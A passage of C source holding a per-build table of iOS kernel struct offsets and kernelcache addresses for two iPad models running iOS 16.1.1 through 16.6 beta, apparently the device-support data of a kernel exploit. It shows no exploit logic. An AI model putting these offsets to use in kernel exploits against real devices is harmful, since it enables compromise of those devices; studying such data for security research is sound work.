0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000aad5288, .kernelcache__gPhysBase = 0xfffffe0007a84100, .kernelcache__gPhysSize = 0xfffffe0007a84100 + 8, .kernelcache__gVirtBase = 0xfffffe0007a822d8, .kernelcache__perfmon_devices = 0xfffffe000ab13520, .kernelcache__perfmon_dev_open = 0xfffffe00080d45c0, .kernelcache__ptov_table = 0xfffffe00079cf188, .kernelcache__vm_first_phys_ppnum = 0xfffffe000ab12990, .kernelcache__vm_pages = 0xfffffe00079cbeb8, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00079ce128, .kernelcache__vm_page_array_ending_addr = 0xfffffe000ab12988, .kernelcache__vn_kqfilter = 0xfffffe000812374c, }, // iOS 16.6b1 { .kern_version = "Darwin Kernel Version 22.6.0: Tue May 9 06:17:58 PDT 2023; root:xnu-8796.140.12.502.1~12/RELEASE_ARM64_T8103", .build_version = "20G5026e", .device_id = "iPad13,7", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000ab85ab0, .kernelcache__gPhysBase = 0xfffffe0007a982a8, .kernelcache__gPhysSize = 0xfffffe0007a982a8 + 8, .kernelcache__gVirtBase = 0xfffffe0007a96460, .kernelcache__perfmon_devices = 0xfffffe000abc5550, .kernelcache__perfmon_dev_open = 0xfffffe00080f8dfc, .kernelcache__ptov_table = 0xfffffe00079e39c8, .kernelcache__vm_first_phys_ppnum = 0xfffffe000abc4910, .kernelcache__vm_pages = 0xfffffe00079e0108, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00079e2968, .kernelcache__vm_page_array_ending_addr = 0xfffffe000abc4908, .kernelcache__vn_kqfilter = 0xfffffe0008147958, }, // iPad Pro 11 inch 5th // // iOS 16.1.1 { .kern_version = "Darwin Kernel Version 22.1.0: Thu Oct 6 19:33:23 PDT 2022; root:xnu-8792.42.7~1/RELEASE_ARM64_T8103", .build_version = "20B101", .device_id = "iPad13,8", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x530, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x630, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0x0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000a9ed168, .kernelcache__gPhysBase = 0xfffffe000799be40, .kernelcache__gPhysSize = 0xfffffe000799be40 + 8, .kernelcache__gVirtBase = 0xfffffe000799a028, .kernelcache__perfmon_devices = 0xfffffe000aa28330, .kernelcache__perfmon_dev_open = 0xfffffe00080b3330, .kernelcache__ptov_table = 0xfffffe00078e79c0, .kernelcache__vm_first_phys_ppnum = 0xfffffe000aa27780, .kernelcache__vm_pages = 0xfffffe00078e46d8, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00078e6970, .kernelcache__vm_page_array_ending_addr = 0xfffffe000aa27778, .kernelcache__vn_kqfilter = 0xfffffe00081057dc, }, // iOS 16.2 { .kern_version = "Darwin Kernel Version 22.2.0: Mon Nov 28 20:09:33 PST 2022; root:xnu-8792.62.2~1/RELEASE_ARM64_T8103", .build_version = "20C65", .device_id = "iPad13,8", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x630, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000a9f5190, .kernelcache__gPhysBase = 0xfffffe00079a00c8, .kernelcache__gPhysSize = 0xfffffe00079a00c8 + 8, .kernelcache__gVirtBase = 0xfffffe000799e2a8, .kernelcache__perfmon_devices = 0xfffffe000aa303b0, .kernelcache__perfmon_dev_open = 0xfffffe00080b7f50, .kernelcache__ptov_table = 0xfffffe00078eb378, .kernelcache__vm_first_phys_ppnum = 0xfffffe000aa2f800, .kernelcache__vm_pages = 0xfffffe00078e8090, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00078ea328, .kernelcache__vm_page_array_ending_addr = 0xfffffe000aa2f7f8, .kernelcache__vn_kqfilter = 0xfffffe000810a50c, }, // iOS 16.3 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:25:19 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8103", .build_version = "20D47", .device_id = "iPad13,8", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x630, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000aa01190, .kernelcache__gPhysBase = 0xfffffe00079a01b0, .kernelcache__gPhysSize = 0xfffffe00079a01b0 + 8, .kernelcache__gVirtBase = 0xfffffe000799e390, .kernelcache__perfmon_devices = 0xfffffe000aa3c3b0, .kernelcache__perfmon_dev_open = 0xfffffe00080b7cc4, .kernelcache__ptov_table = 0xfffffe00078eb3b8, .kernelcache__vm_first_phys_ppnum = 0xfffffe000aa3b800, .kernelcache__vm_pages = 0xfffffe00078e80d0, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00078ea368, .kernelcache__vm_page_array_ending_addr = 0xfffffe000aa3b7f8, .kernelcache__vn_kqfilter = 0xfffffe000810a280, }, // iOS 16.3.1 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:25:19 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8103", .build_version = "20D67", .device_id = "iPad13,8", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x630, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000aa01190, .kernelcache__gPhysBase = 0xfffffe00079a01b0, .kernelcache__gPhysSize = 0xfffffe00079a01b0 + 8, .kernelcache__gVirtBase = 0xfffffe000799e390, .kernelcache__perfmon_devices = 0xfffffe000aa3c3b0, .kernelcache__perfmon_dev_open = 0xfffffe00080b7cc4, .kernelcache__ptov_table = 0xfffffe00078eb3b8, .kernelcache__vm_first_phys_ppnum = 0xfffffe000aa3b800, .kernelcache__vm_pages = 0xfffffe00078e80d0, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00078ea368, .kernelcache__vm_page_array_ending_addr = 0xfffffe000aa3b7f8, .kernelcache__vn_kqfilter = 0xfffffe000810a280, }, // iOS 16.4 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:40:42 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8103", .build_version = "20E246", .device_id = "iPad13,8", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000aacd208, .kernelcache__gPhysBase = 0xfffffe0007a7ffc0, .kernelcache__gPhysSize = 0xfffffe0007a7ffc0 + 8, .kernelcache__gVirtBase = 0xfffffe0007a7e198, .kernelcache__perfmon_devices = 0xfffffe000ab0b520, .kernelcache__perfmon_dev_open = 0xfffffe00080d03c0, .kernelcache__ptov_table = 0xfffffe00079cb188, .kernelcache__vm_first_phys_ppnum = 0xfffffe000ab0a990, .kernelcache__vm_pages = 0xfffffe00079c7eb8, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00079ca128, .kernelcache__vm_page_array_ending_addr = 0xfffffe000ab0a988, .kernelcache__vn_kqfilter = 0xfffffe000811f2b4, }, // iOS 16.4.1 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:40:42 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8103", .build_version = "20E252", .device_id = "iPad13,8", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000aacd208, .kernelcache__gPhysBase = 0xfffffe0007a7ffc0, .kernelcache__gPhysSize = 0xfffffe0007a7ffc0 + 8, .kernelcache__gVirtBase = 0xfffffe0007a7e198, .kernelcache__perfmon_devices = 0xfffffe000ab0b520, .kernelcache__perfmon_dev_open = 0xfffffe00080d03c0, .kernelcache__ptov_table = 0xfffffe00079cb188, .kernelcache__vm_first_phys_ppnum = 0xfffffe000ab0a990, .kernelcache__vm_pages = 0xfffffe00079c7eb8, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00079ca128, .kernelcache__vm_page_array_ending_addr = 0xfffffe000ab0a988, .kernelcache__vn_kqfilter = 0xfffffe000811f2b4, }, // iOS 16.5 { .kern_version = "Darwin Kernel Version 22.5.0: Mon Apr 24 21:10:54 PDT 2023; root:xnu-8796.122.4~1/RELEASE_ARM64_T8103", .build_version = "20F66", .device_id = "iPad13,8", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000aad5288, .kernelcache__gPhysBase = 0xfffffe0007a84100, .kernelcache__gPhysSize = 0xfffffe0007a84100 + 8, .kernelcache__gVirtBase = 0xfffffe0007a822d8, .kernelcache__perfmon_devices = 0xfffffe000ab13520, .kernelcache__perfmon_dev_open = 0xfffffe00080d45c0, .kernelcache__ptov_table = 0xfffffe00079cf188, .kernelcache__vm_first_phys_ppnum = 0xfffffe000ab12990, .kernelcache__vm_pages = 0xfffffe00079cbeb8, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00079ce128, .kernelcache__vm_page_array_ending_addr = 0xfffffe000ab12988, .kernelcache__vn_kqfilter = 0xfffffe000812374c, }, // iOS 16.6b1 { .kern_version = "Darwin Kernel Version 22.6.0: Tue May 9 06:17:58 PDT 2023; root:xnu-8796.140.12.502.1~12/RELEASE_ARM64_T8103", .build_version = "20G5026e", .device_id = "iPad13,8", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, 